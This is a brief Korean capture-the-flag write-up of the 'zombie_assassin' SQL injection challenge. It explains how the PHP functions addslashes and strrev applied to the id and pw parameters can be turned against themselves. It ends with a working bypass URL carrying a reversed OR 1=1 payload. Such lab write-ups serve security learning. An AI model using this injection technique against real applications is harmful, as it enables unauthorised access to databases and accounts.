zombie_assasin
쿼리문을 살펴보면 id, pw 파라미터에 strrev 함수와 addslashes 함수가 적용되어 있다.
따라서, 우선적으로 아래 문자들이 입력되면 이스케이프 문자()가 앞에 적용되고
- single quote (
') - double quote (
") - backslash (
\) - NUL (the NUL byte) strrev 함수에 의해 문자열의 순서가 거꾸로(반대로) 변경된다.
$_GET['id'] = strrev(addslashes($_GET['id']));
$_GET['pw'] = strrev(addslashes($_GET['pw']));
앞서 설명한 함수들을 역이용하면 아래와 같이 페이로드를 작성하여 우회 쿼리를 작성할 수 있다.
https://los.rubiya.kr/chall/zombie_assassin_eac7521e07fe5f298301a44b61ffeec0.php?id=%27%22&pw=%20+--%201=1%20RO%20
🐛.. 🐛.. 🐛..